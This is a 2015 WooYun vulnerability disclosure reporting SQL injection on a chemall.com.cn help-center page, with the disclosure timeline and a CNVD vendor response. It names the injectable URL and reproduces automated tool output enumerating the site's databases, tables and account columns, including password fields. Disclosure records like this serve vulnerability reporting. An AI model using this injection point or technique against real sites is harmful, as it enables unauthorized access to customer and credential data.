当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128515

漏洞标题:中国石油和化工网某站SQL注入

相关厂商:中国石油和化工网

漏洞作者: 蝶.!

提交时间:2015-07-22 23:35

修复时间:2015-09-10 08:22

公开时间:2015-09-10 08:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-22: 细节已通知厂商并且等待厂商处理中
2015-07-27: 厂商已经确认,细节仅向厂商公开
2015-08-06: 细节向核心白帽子及相关领域专家公开
2015-08-16: 细节向普通白帽子公开
2015-08-26: 细节向实习白帽子公开
2015-09-10: 细节向公众公开

简要描述:

中国石油和化工网某站SQL注入
中国石油和化工网(www.chemall.com.cn)创立于2000年3月,由北京朗津网络信息技术有限公司运营。经过十多年的发展,注册客户9万余家,曾评为中国行业网站100强。

详细说明:

注入点:http://chemall.com.cn:80/helpcenter/lawindex.asp?lawtype=%B7%A8%C2%C9
Selected Column Count is 6
Valid String Column is 4
DB Server: MsSQL no error
DB Name: helpenter
Count(name) of [master]..[sysdatabases] is 18
Data Base Found: master
Data Base Found: tempdb
Data Base Found: model
Data Base Found: msdb
Data Base Found: chemall@cip#2010
Data Base Found: chemall@equip#2011
Data Base Found: chemall@infocenter#2011
Data Base Found: chemall@jc@2011
Data Base Found: chemall@newschem@2011
Data Base Found: chemall@tech@2011
Data Base Found: chemall@zhaobiao#2011
Data Base Found: chemallmanager@#2011
Data Base Found: db_equipment#2012
Data Base Found: db_product@#chemall
Data Base Found: helpenter
Data Base Found: chemall@hr@2011
Data Base Found: chemallmanager@#2014
Data Base Found: db20150329

漏洞证明:

Count(name) of [helpenter]..[sysobjects] where xtype=char(85) is 13
Table found: lawer
Table found: tab_cas
Table found: tab_MSDS
Table found: Taxrate
Table found: tab_wl
Table found: tab_chemKnowledge
Table found: tab_catalog_two
Table found: tab_catalog_one
Table found: tab_manager
Table found: tab_teachex
Table found: pangolin_test_table
Table found: tab_file
Table found: dtproperties
Count(name) of [chemallmanager@#2014]..[sysobjects] where xtype=char(85) is 56
Table found: contractmore
Table found: customer
Table found: contracttype
Table found: counttype
Table found: customerlevel
Table found: customerstatus
Table found: producttype
Table found: customertryoutmore
Table found: customertype
Table found: employee
Table found: employeetype
Table found: finance
Table found: tab_area
Table found: financemore
Table found: role
Table found: log
Table found: infotype
Table found: admin
Table found: tab_chatting
Table found: tab_limit
Table found: page
Table found: product
Table found: jobduty
Table found: contact
Table found: productmore
Table found: productprice
Table found: treepage
I got bored of waiting more than 60 seconds! (request timed out)
Failed to get table no. 29
Table found: tab_customer_banner
Table found: companybusinesstype
Table found: tab_shopmode
Table found: tab_mem_cbcnumber
Table found: companyinfo
Table found: tab_diploma
Table found: contract
Table found: account
Table found: accountlimit
Table found: tab_manager
Table found: accounttreepage
Table found: accounttype
Table found: tab_position
Table found: cbcnumber
Table found: accounttypelimit
Table found: accounttypetreepage
Table found: tab_cus_com
Table found: actinpage
Table found: dtproperties
Table found: adplace
Table found: equipment
Table found: adplacetype
Table found: customerintent
Table found: area
Table found: tab_customerlimit
Table found: salescustomer
Table found: businessproduct
Column found: cbcbit
Column found: cbcnumber
Column found: cbcstate
Column found: id
Can not get Count(name) of [chemallmanager@#2014]..[syscolumns] where id=(select id from [chemallmanager@#2014]....sysobjects where name=char(97)%2bchar(99)%2bchar(99)%2bchar(111)%2bchar(117)%2bchar(110)%2bchar(116))
Column found: account_id
Column found: account_isuse
Column found: account_loginname
Column found: account_pwd
Column found: accounttype_id
Column found: employee_id

修复方案:

版权声明:转载请注明来源 蝶.!@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-27 08:21

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无